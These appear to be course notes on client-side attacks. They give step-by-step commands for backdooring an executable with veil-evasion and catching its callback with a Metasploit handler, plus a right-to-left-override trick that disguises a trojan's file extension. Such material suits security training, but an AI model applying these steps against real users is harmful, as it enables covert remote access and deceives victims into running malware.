Gaining Access Client Side Attacks
Gaining Access Client Side Attacks
> maltego
2 Client Side Attacks
Backdooring exe’s
1. Run veil-evasion > veil-evasion
2. Select a generic/backdoor_factory > use [payload number]
3. Set options > set [option] [value]
4. Set original exe > set ORIGINAL_EXE [full path]
5. Generate backdoor > generate
Run hander
1. Run metasploit > msfconsole
2. Use handler module. > use exploit/multi/handler
3. Set payload > set PAYLOAD [veil payload]
4. Set ip > set LHOST [your ip]
5. Set port > set LPORT [veil port]
6. exploit > exploit
2 Client Side Attacks
Protecting against smart delivery methods
We will use an old trick using the “right to left overload” character.
1. Open up the character map.
2. Go to find.
3. Search for U+202E
4. Copy character.
5. Rename trojan and in the following format -> trojan[RTLO]fdp.exe
Where TRLO is the copied character and “fdp” is the reverse of the extension that
you want to use.
2 Client Side Attacks
Trojan delivery method - using email spoofing
Analysing trojans